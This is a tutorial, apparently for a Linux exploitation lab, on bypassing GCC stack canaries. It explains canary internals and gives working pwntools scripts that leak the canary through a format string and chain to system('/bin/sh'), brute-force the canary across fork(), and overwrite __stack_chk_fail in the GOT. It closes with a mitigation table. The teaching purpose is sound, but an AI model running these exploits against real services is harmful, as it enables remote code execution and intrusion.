GCC’s stack canary (the “stack smashing protector”, SSP) places a random word between local variables and the saved return address. The function epilogue re-reads that word and aborts via __stack_chk_fail if it changed. A linear stack overflow that overwrites the saved RIP must also overwrite the canary — and unless you know its value, the program dies before ret ever runs.
This tutorial covers four practical bypasses: leaking the canary with a format string, brute-forcing it byte by byte across fork(), redirecting __stack_chk_fail in the GOT, and pivoting around the check entirely. It also covers what does not work, because students burn a lot of time on those paths.
Note
Lab Binary: This tutorial uses the target binary from the Linux Exploitation Lab (14-stack-canaries/). See the setup guide for build instructions.
How GCC Stack Canaries Actually Work
The common flavours
GCC offers several stack protector modes. These are the common ones you will see in exploitation labs and distro builds:
| Flag | Functions instrumented |
|---|---|
| -fstack-protector | Functions that call alloca or have a char buffer of at least 8 bytes (tunable via --param ssp-buffer-size) |
| -fstack-protector-strong | Functions with any local array, alloca, or address-taken locals |
| -fstack-protector-all | Every function frame, regardless of contents |
| -fstack-protector-explicit | Only functions annotated with the stack_protect attribute |
Most Linux distros build user binaries with -fstack-protector-strong. -fstack-protector-all is less common because instrumenting every function costs code size and cycles; expect it mainly in deliberately hardened builds.
Where the canary lives
On x86_64, the canary is loaded from the Thread Local Storage block at offset 0x28:
mov rax, QWORD PTR fs:0x28
On i386, it lives at gs:0x14. The TLS block itself is set up by glibc. Modern glibc initializes the canary from the kernel-provided AT_RANDOM auxiliary vector via _dl_setup_stack_chk_guard(), then stores the result in TLS.
The all-zero low byte
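On little-endian glibc targets such as x86_64, the least significant byte of the canary is always \x00. This is by design. That byte sits at the lowest address of the canary, directly above the locals, so NUL-terminated string operations stop there. A strcpy() overflow cannot overwrite past the canary while keeping it intact, because the copy ends at the first NUL it writes. Likewise a puts() or printf("%s") that runs off the end of an unterminated buffer stops at the zero byte before disclosing the random bytes. Functions that do not treat NUL specially, such as gets() (which stops at newline) and read(), can still write all 8 bytes. Do not mistake the zero byte for a weakness: it is a deliberate barrier, not a leaked secret. The remaining 7 bytes are random.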
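As a rough model of the two points above (the guard is seeded from AT_RANDOM and its low byte is forced to zero), the following Python sketch mimics the result on a little-endian 64-bit target. The function name derive_guard is made up for illustration, and os.urandom stands in for the 16 kernel-supplied AT_RANDOM bytes; the real logic is C code inside glibc.

```python
import os
import struct

def derive_guard(at_random: bytes) -> int:
    """Illustrative model of the stack guard on little-endian x86_64."""
    # Take the first machine word (8 bytes) of the random block.
    (word,) = struct.unpack('<Q', at_random[:8])
    # Clear the least significant byte, which is the first byte in memory.
    return word & ~0xFF

guard = derive_guard(os.urandom(16))
print(f'guard     = {guard:#018x}')
print('in memory =', struct.pack('<Q', guard).hex())
```

The second line of output shows why the zero byte matters for string functions: in memory, the canary starts with 00.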
Prologue and epilogue
A function with a vulnerable buffer compiled with -fstack-protector-strong looks like this:
; --- prologue ---
push rbp
mov rbp, rsp
sub rsp, 0x130
mov rax, QWORD PTR fs:0x28 ; load canary from TLS
mov QWORD PTR [rbp-0x8], rax ; store on stack just below saved RBP
xor eax, eax
; ... function body, gets(buf), etc ...
; --- epilogue ---
mov rax, QWORD PTR [rbp-0x8] ; reload from stack
sub rax, QWORD PTR fs:0x28 ; compare against TLS copy
jne .stack_chk_failed ; mismatch -> die
leave
ret
.stack_chk_failed:
call __stack_chk_fail@plt
__stack_chk_fail calls __fortify_fail, which prints a “stack smashing detected” diagnostic through glibc’s fatal-message path and then aborts. The diagnostic does not include the canary value. Whether a remote attacker sees the text depends on how the service wired file descriptor 2; in many inetd-style services stderr is not connected to the attacker’s socket, so the observable signal is just a dropped connection.
Stack layout
High addr
+---------------------------+
| saved RIP | <- ret target
+---------------------------+
| saved RBP |
+---------------------------+
| canary (8 bytes, low=00) | <- compared in epilogue
+---------------------------+
| local variables |
| char buf[256] | <- overflow source
+---------------------------+
Low addr (RSP)
A linear overflow walks low-to-high: buffer -> canary -> saved RBP -> saved RIP. To reach RIP you must write through the canary. If your write doesn’t preserve the canary’s exact value, you abort.
Thread and fork behavior
On mainstream glibc, new threads receive a copy of the creating thread’s stack guard in their TLS. That means a leak from one thread is generally useful elsewhere in the same process unless the program or runtime explicitly rekeys guards. Forking servers are even simpler: the child inherits the parent’s address space, including the TLS block holding the canary.
Initial Analysis
checksec ./target
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE
Disassemble main to confirm a real GCC canary (not a hand-rolled integrity word):
objdump -d -M intel ./target | grep -A2 -B2 'fs:0x28'
401234: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28
40123b: 00 00
40123d: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax
...
4012a5: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8]
4012a9: 64 48 33 04 25 28 00 xor rax,QWORD PTR fs:0x28
4012b0: 00 00
4012b2: 74 05 je 4012b9 <main+0x85>
4012b4: e8 87 fd ff ff call 401040 <__stack_chk_fail@plt>
This xor/je form is what older GCC releases emit; newer releases use sub plus jne, as in the prologue/epilogue listing earlier. Same effect.
Bypass 1: Leak via Format String
If you have a format-string bug before the overflow, leak the canary, then splice it back into the overflow payload at the right offset.
See Format String Vulnerabilities on x86 for the mechanics. Quick recap: %N$p reads the Nth stack argument as a pointer and prints it.
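To make the recap concrete: under the x86_64 System V calling convention printf receives the format string in rdi, so %1$p through %5$p show rsi, rdx, rcx, r8 and r9, and %6$p is the first 8-byte slot at rsp at the time of the call. The sketch below turns a stack offset into a %N$p index and filters a leak for canary-looking values. Both helper names, the 0x88 offset, and the sample values are illustrative assumptions, not measurements from the lab binary.

```python
def fmt_index(offset_from_rsp: int) -> int:
    """%N$p index of the 8-byte stack slot at rsp+offset (x86_64 System V)."""
    assert offset_from_rsp % 8 == 0, 'stack slots are 8 bytes wide'
    return 6 + offset_from_rsp // 8   # five register arguments come first

def canary_candidates(leaked):
    """Values with a zero low byte that cannot be user-space pointers."""
    # User-space addresses fit in 47 bits; a random 7-byte value almost never does.
    return [v for v in leaked if v & 0xFF == 0 and v >> 47 != 0]

print(fmt_index(0x88))   # index for a canary assumed to sit at rsp+0x88
leak = [0x7ffe1234abcd, 0x4011a0, 0x0, 0xb4d3f8c1e2a70000]
print([hex(v) for v in canary_candidates(leak)])
```

The filter is only a heuristic; confirm the chosen slot in a debugger before relying on it.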
Finding the canary’s format-string offset
./target
> %1$p %2$p %3$p ... %30$p
0x7ffe1234abcd 0x4011a0 ... 0xb4d3f8c1e2a70000
Pick the value with a zero low byte and high entropy in the remaining bytes; next to stack pointers (0x7ffe...) and code addresses (0x40....) it stands out. The index depends on the frame layout, compiler version, and optimization level, so do not reuse a number from another binary. The examples below use %23$p. Verify in GDB:
gdb-peda$ b *main+EPILOGUE_OFFSET
gdb-peda$ run
gdb-peda$ x/gx $rbp-0x8
0x7fffffffe418: 0xb4d3f8c1e2a70000
Two-shot exploit
If the program loops (read -> print -> read -> print, then eventually return), one request leaks, the next overflows:
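from pwn import *
context.arch = 'amd64'
elf = ELF('./target')
io = remote('target', 5556)
# Gadget and symbol lookups. These assume the binary contains a
# "pop rdi; ret" gadget, a "/bin/sh" string, and a PLT entry for system();
# substitute your own addresses if it does not.
pop_rdi = ROP(elf).find_gadget(['pop rdi', 'ret'])[0]
sh_str = next(elf.search(b'/bin/sh\x00'))
system_plt = elf.plt['system']
# Stage 1: leak canary
io.sendlineafter(b'> ', b'%23$p')
canary = int(io.recvline().strip(), 16)
log.info(f'canary = {canary:#018x}')
assert canary & 0xff == 0, 'low byte must be zero'
# Stage 2: overflow with canary preserved
buf = b'A' * 264 # buffer fill up to canary
buf += p64(canary) # restore canary
buf += b'B' * 8 # saved RBP (any value)
buf += p64(pop_rdi) + p64(sh_str) # ROP starts here
buf += p64(system_plt)
io.sendlineafter(b'> ', buf)
io.interactive()
The 264-byte fill assumes a char buf[256] plus 8 bytes of other locals; adjust to your binary. Use a cyclic pattern to find the exact canary offset if you don’t know it. If system() crashes on a movaps instruction, the stack is misaligned; one extra ret gadget in front of pop_rdi usually fixes it.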
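The payload layout can also be written with the standard library alone, which makes the offsets explicit. This is a sketch under the same assumption as the exploit above (264 bytes from the start of the buffer to the canary); build_overflow and the chain addresses in the usage lines are placeholders, not values from the lab binary.

```python
import struct

def build_overflow(canary, chain, fill=264, saved_rbp=0x4242424242424242):
    """Linear overflow: filler, intact canary, saved RBP, then the ROP chain."""
    payload = b'A' * fill
    payload += struct.pack('<Q', canary)      # must equal the TLS copy exactly
    payload += struct.pack('<Q', saved_rbp)   # not checked by the epilogue
    for qword in chain:                       # first entry lands on saved RIP
        payload += struct.pack('<Q', qword)
    return payload

# Placeholder chain: three made-up 64-bit values.
payload = build_overflow(0xb4d3f8c1e2a70000, [0x401111, 0x402222, 0x401040])
print(len(payload))
print(payload[264:272].hex())   # canary bytes as they appear in memory
```

Printing the slice at the canary offset is a cheap sanity check that the leaked value went back in little-endian order.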
Bypass 2: Brute Force Across Forks
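When a server uses accept() -> fork() -> handle, every child inherits the parent’s address space, including the TLS block holding the canary. Crash one child and the parent forks another with the same canary. This is the canary’s worst case. It applies to servers that fork inside their own accept loop; wrappers such as inetd, xinetd, or socat with EXEC start a fresh binary per connection and do not qualify, for the reasons listed below.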
Why it works
fork() performs a copy-on-write clone of the parent’s pages. TLS lives in the parent and is copied into the child intact. The child’s fs:0x28 returns the same 8 bytes the parent had. Crashing the child does not perturb the parent’s TLS, and the next fork() produces another child with the same value.
This does not work if:
- The server exec()s a fresh binary per connection (new process image -> new TLS -> new canary).
- The service restarts the whole binary on crash (e.g. systemd restart-on-failure).
- The service uses pre-fork worker pools where workers are recycled via exec.
The bypass requires fork() without exec(). Make sure of this before sinking 1700 requests into nothing.
Byte-by-byte walk
The low byte is \x00. The other 7 bytes are random but fixed across forks. Brute force one byte at a time, overwriting only the bytes guessed so far so that the rest of the canary stays intact:
- Set canary[0] = \x00 (known).
- For each of canary[1..7]: try values \x00 through \xff until the child does not crash.
- A wrong byte triggers __stack_chk_fail -> abort() -> connection drops. A right byte means the function returns normally: the connection persists, output appears, whatever the program does after the vulnerable function happens.
- After 7 bytes, you have the full canary.
Worst case 256 * 7 = 1792 connections; average case ~896. Trivially fast over localhost or a LAN.
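The walk can be simulated offline to check the arithmetic. In this sketch a Python function stands in for the forked child: it keeps one fixed secret, as fork() would, and reports survival only if the overwritten prefix matches. SECRET, child_survives and brute_force are invented for the simulation; no network or real process is involved.

```python
import os

SECRET = b'\x00' + os.urandom(7)   # same value for every simulated child

def child_survives(overwrite: bytes) -> bool:
    """Only the first len(overwrite) canary bytes are clobbered."""
    on_stack = overwrite + SECRET[len(overwrite):]
    return on_stack == SECRET      # models the epilogue check

def brute_force():
    known, attempts = b'\x00', 0   # low byte is known to be zero
    while len(known) < 8:
        for guess in range(256):
            attempts += 1
            if child_survives(known + bytes([guess])):
                known += bytes([guess])
                break
    return known, attempts

canary, attempts = brute_force()
print(canary.hex(), attempts)
```

The attempt counter always stays at or below 1792, and the recovered value equals the secret because untouched bytes keep matching.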
pwntools brute forcer
Assume the vulnerable function reads up to BUFLEN + 8 bytes with a single read() and returns, so a short write overwrites only part of the canary. If the overwritten bytes are correct, a known confirmation byte gets echoed; if not, the connection drops.
from pwn import *
import socket
HOST, PORT = 'target', 5556
BUFLEN = 264 # buffer size up to canary
def try_prefix(prefix):
    """Overwrite only the first len(prefix) bytes of the canary.
    Return True if the child survived past the canary check."""
    try:
        io = remote(HOST, PORT, timeout=2)
        # Send exactly BUFLEN + len(prefix) bytes and no newline. Canary bytes
        # beyond the prefix stay untouched, so they still match. Padding the
        # guess out to 8 bytes would clobber them and every guess would fail.
        payload = b'A' * BUFLEN + prefix
        # do NOT include any extra bytes: we only want to overwrite up to
        # the guessed canary bytes, not RBP/RIP.
        io.send(payload)
        # Probe: if the canary matched, the function returned and the program
        # sent its normal post-function output. If it mismatched, abort()
        # killed the child and recv() returns empty or raises EOFError.
        data = io.recv(timeout=1)
        io.close()
        return len(data) > 0
    except (EOFError, socket.error):
        return False
canary = b'\x00' # low byte is always 0
for byte_idx in range(1, 8):
    log.info(f'brute byte {byte_idx}')
    for guess in range(256):
        candidate = canary + bytes([guess])
        if try_prefix(candidate):
            canary = candidate
            log.success(f'byte {byte_idx} = {guess:#04x} canary so far = {canary.hex()}')
            break
    else:
        log.failure(f'byte {byte_idx}: no value worked -- check your assumptions')
        break
if len(canary) == 8:
    log.success(f'full canary: {canary.hex()}')
Probe quality matters
The above relies on “did we get any data back” as the oracle. That is brittle. Better oracles:
- Time the response. A surviving child does some work; a crashing child returns near-instantly when abort() runs. Measure both and pick a threshold.
- Look for a specific byte the program prints only on the success path.
- Use a two-stage payload: overflow, then send a second message; only a surviving child reads the second message.
Pick whichever distinguishes survival from crash most reliably for your target.
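For the timing oracle, one simple way to pick the threshold is to calibrate on a few known-crash and known-survive requests and take the midpoint. The helpers below are a hypothetical sketch; the sample timings are made-up numbers, and a noisy target may need more samples or a different statistic.

```python
def pick_threshold(crash_times, survive_times):
    """Midpoint between the slowest crash and the fastest survival (seconds)."""
    slowest_crash = max(crash_times)
    fastest_survive = min(survive_times)
    if slowest_crash >= fastest_survive:
        raise ValueError('timings overlap; use a different oracle')
    return (slowest_crash + fastest_survive) / 2

def survived(elapsed, threshold):
    """Classify one request by its response time."""
    return elapsed > threshold

# Made-up calibration samples, in seconds.
threshold = pick_threshold([0.004, 0.006, 0.005], [0.050, 0.047, 0.061])
print(threshold, survived(0.052, threshold), survived(0.005, threshold))
```

Refusing to return a threshold when the two sample sets overlap is deliberate: an ambiguous oracle silently corrupts the byte-by-byte walk.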
Caveat: where the overflow stops
For brute force, only overwrite up to and including the canary bytes you are guessing. Do not overwrite the saved RBP or RIP yet. The canary is checked before leave and ret, so a correct guess passes the check either way, but a clobbered saved RBP or RIP then crashes the process at ret or in the caller. To your oracle that crash looks exactly like a canary failure, giving you a false negative (process dies but not via the canary path).
Once you have the full canary, do a final exploit shot that includes the canary plus a full ROP chain.
Bypass 3: Overwriting __stack_chk_fail in the GOT
If you have a write primitive independent of the canary path — a format-string %hn write, an arbitrary-write heap bug, an out-of-bounds array write — you can redirect __stack_chk_fail@got.plt to a function of your choice. The canary check still happens, the mismatch is still detected, but the call goes somewhere harmless or attacker-controlled.
Useful targets to redirect to:
- exit: silently terminate without abort/SIGABRT and without printing the diagnostic. Useful in info-leak contexts where you’ve already extracted what you need.
- A one-gadget in libc (execve("/bin/sh", 0, 0) style): if libc is leaked, redirect straight to a one-gadget. Its constraints (specific register/stack states) are sometimes satisfied at the canary-check site because the function frame is still intact, but verify them in a debugger rather than assuming.
- A jump back into the binary’s code, e.g. an existing function, or a shellcode buffer whose address you control if NX is disabled.
Finding the GOT entry
objdump -R ./target | grep stack_chk_fail
0000000000404038 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4
0x404038 is the GOT slot. With Partial RELRO this slot is writable at runtime; with Full RELRO it is not (see below).
Skeleton: format string overwrite
Assume a format-string primitive that lets you write 2 bytes at a time via %hn:
from pwn import *
context.arch = 'amd64'
io = remote('target', 5556)
stack_chk_got = 0x404038
target_addr = 0x4012e0 # function we want to call instead
# fmtstr_payload writes target_addr at stack_chk_got
# offset 6 = where our format-string buffer begins on the stack (verify!)
# write_size='short' makes it emit %hn (2-byte) writes; the default is %hhn
payload = fmtstr_payload(6, {stack_chk_got: target_addr}, write_size='short')
io.sendline(payload)
# Now trigger the overflow. The canary check WILL detect the mismatch
# and call __stack_chk_fail@plt -- which now resolves to target_addr.
overflow = b'A' * 264
overflow += b'CANARY!!' # garbage, doesn't matter
overflow += b'B' * 8 # saved RBP
overflow += p64(0xdeadbeef) # saved RIP, won't be reached
io.sendline(overflow)
io.interactive()
The trick is that the canary check now becomes the trigger for code execution rather than a kill switch. You don’t need to know the canary value at all; you want it to mismatch.
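For intuition about what a %hn-based write has to do, the sketch below splits the new pointer into 16-bit chunks and computes how many extra characters must be printed before each %hn. It is a simplified model: plan_hn_writes is a made-up helper, it ignores the bytes the payload itself prints, and it is not a replacement for fmtstr_payload.

```python
def plan_hn_writes(addr: int, value: int, width: int = 8):
    """Return (target address, 16-bit value, padding) per %hn write."""
    chunks = [(addr + i, (value >> (8 * i)) & 0xFFFF) for i in range(0, width, 2)]
    # %hn stores the running character count, which only grows,
    # so write the smallest chunk first.
    chunks.sort(key=lambda c: c[1])
    plan, printed = [], 0
    for target, short in chunks:
        pad = (short - printed) % 0x10000   # extra characters before this %hn
        plan.append((target, short, pad))
        printed += pad
    return plan

# Same addresses as the skeleton above: GOT slot and replacement target.
for target, short, pad in plan_hn_writes(0x404038, 0x4012e0):
    print(f'{target:#x} <- {short:#06x} after {pad} more chars')
```

Sorting by value keeps the total output short; writing chunks in address order would also work but needs wrap-around padding of up to 65535 characters per write.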
Constraint: lazy resolution path
__stack_chk_fail@plt typically goes through .got.plt (lazy resolution table), not the immutable .got. Partial RELRO leaves .got.plt writable. Full RELRO (-Wl,-z,relro,-z,now) resolves all symbols at load time and remaps .got.plt read-only. With Full RELRO, this whole bypass is dead — writing to 0x404038 will fault.
Check at runtime:
gdb-peda$ vmmap 0x404038
Start End Perm
0x0000000000404000 0x0000000000405000 r--p # Full RELRO: read-only
0x0000000000404000 0x0000000000405000 rw-p # Partial RELRO: writable
Why exit is the cleanest target
If you’ve already exfiltrated what you need (a leaked libc address, a flag, a token) before the overflow, redirecting __stack_chk_fail to exit lets the program terminate without the SSP diagnostic ever firing. No “stack smashing detected” line in the journal, no SIGABRT, no core dump. Stealth bypass.
Bypass 4: Stack Pivot Around the Check
The canary is checked in the function’s epilogue. If you can transfer control somewhere else without traversing that epilogue, the check never runs.
This is rare. Cases where it happens:
- The vulnerable function calls something that itself takes a function pointer from the corrupted stack region (a corrupted vtable, an indirect call through a struct field). You hijack control before the canary check.
- A heap or BSS bug overwrites a saved jump target used elsewhere. You return cleanly from the canary-protected function, then control flow reaches the corrupted pointer later.
- An exception handler / longjmp / SIGSEGV handler is reachable. siglongjmp jumps to a saved context without unwinding the way ret does, skipping the canary check.
Brief mention only. If you have one of these primitives, you usually don’t need to think about the canary at all — just don’t disturb it.
What Doesn’t Work
“I’ll just guess the canary”
7 bytes of randomness = 2^56 possibilities. Without fork() reuse, a fresh canary per process means roughly 72 quadrillion guesses. Not happening.
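The gap between blind guessing and the forked byte-by-byte walk is easy to quantify. The rate of 1,000 guesses per second is an arbitrary assumption for illustration.

```python
full_space = 2 ** 56            # 7 unknown bytes, guessed all at once
bytewise_worst = 256 * 7        # 7 unknown bytes, guessed one at a time
rate = 1000                     # guesses per second (assumed)
seconds_per_year = 365 * 24 * 3600

# With a fresh canary per process every guess is independent, so the
# expected number of tries equals the size of the space.
years_blind = full_space / rate / seconds_per_year

print(f'{full_space:,} possibilities')
print(f'about {years_blind:,.0f} years expected when guessing blind')
print(f'{bytewise_worst} requests worst case with fork() reuse')
```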
“I’ll write whatever I want and hope”
Some students send \x00\x00\x00\x00\x00\x00\x00\x00 figuring “the low byte is zero, maybe the rest is too.” It isn’t. The other 7 bytes are random data initialized from AT_RANDOM. The probability of an all-zero canary is 1 in 2^56.
“PIE will protect me”
PIE randomizes the binary’s base address. It does not affect the canary at all — the canary lives in TLS, controlled by glibc, independent of PIE. A format-string leak gives you the canary regardless of whether the binary is PIE.
“The stack canary diagnostic will leak into my socket”
__stack_chk_fail emits a fatal diagnostic and aborts, but the message does not contain the canary value. Whether you see the text over the network depends entirely on how stderr is connected. Many services leave stderr on a terminal, a log, or /dev/null; some challenge harnesses wire it to the socket. Treat the abort as a crash oracle, not an information leak.
“Partial RELRO is the same as Full RELRO”
It isn’t. Partial RELRO marks .got (initial symbols) read-only but leaves .got.plt (lazy-resolved entries) writable. __stack_chk_fail is in .got.plt. Partial RELRO does not block Bypass 3. Always check with checksec or by inspecting page permissions.
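Inspecting page permissions does not require a debugger. On Linux, /proc/<pid>/maps lists every mapping with its permission bits; the sketch below parses that format and reports the permissions covering a given address. The helper name, the file path, and the two sample lines are illustrative assumptions.

```python
def perms_at(maps_text: str, addr: int):
    """Return the permission string of the mapping containing addr, or None."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        start, end = (int(x, 16) for x in fields[0].split('-'))
        if start <= addr < end:
            return fields[1]
    return None

# Two made-up lines in /proc/<pid>/maps format.
sample = (
    '00403000-00404000 r--p 00002000 08:01 1234 /lab/target\n'
    '00404000-00405000 rw-p 00003000 08:01 1234 /lab/target\n'
)
perms = perms_at(sample, 0x404038)
print(perms, 'writable' if 'w' in perms else 'read-only')

# Against a live process, where pid is the target's process id:
# perms_at(open(f'/proc/{pid}/maps').read(), 0x404038)
```

A result of rw-p for the GOT slot means the overwrite is possible; r--p means the binary was linked with Full RELRO.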
Mitigations Summary
| Mitigation | Blocks Bypass 1 (leak) | Blocks Bypass 2 (brute) | Blocks Bypass 3 (GOT) |
|---|---|---|---|
| -fstack-protector -> -strong | No | No | No |
| Full RELRO | No | No | Yes |
| exec() per connection (no fork) | No | Yes | No |
| No format-string vulnerability | Yes | No | No (if other write exists) |
The combination that actually defeats these bypasses: Full RELRO + no format-string bug + no independent write primitive + fresh process state for each connection. Most production binaries lack at least one of these.
Key Takeaways
- The canary lives in TLS at fs:0x28 on x86_64. The low byte is always \x00 by design.
- fork() without exec() reuses the canary, enabling a byte-by-byte brute force of at most 1792 requests.
- A format-string leak ends the protection: read the canary, splice it into your overflow.
- GOT overwrite of __stack_chk_fail turns the kill switch into a jump primitive, but only when Full RELRO is absent.
- The diagnostic does not leak the canary. At most it gives you a crash/survival signal.
- PIE does not interact with the canary. A leak is a leak whether or not the binary is position-independent.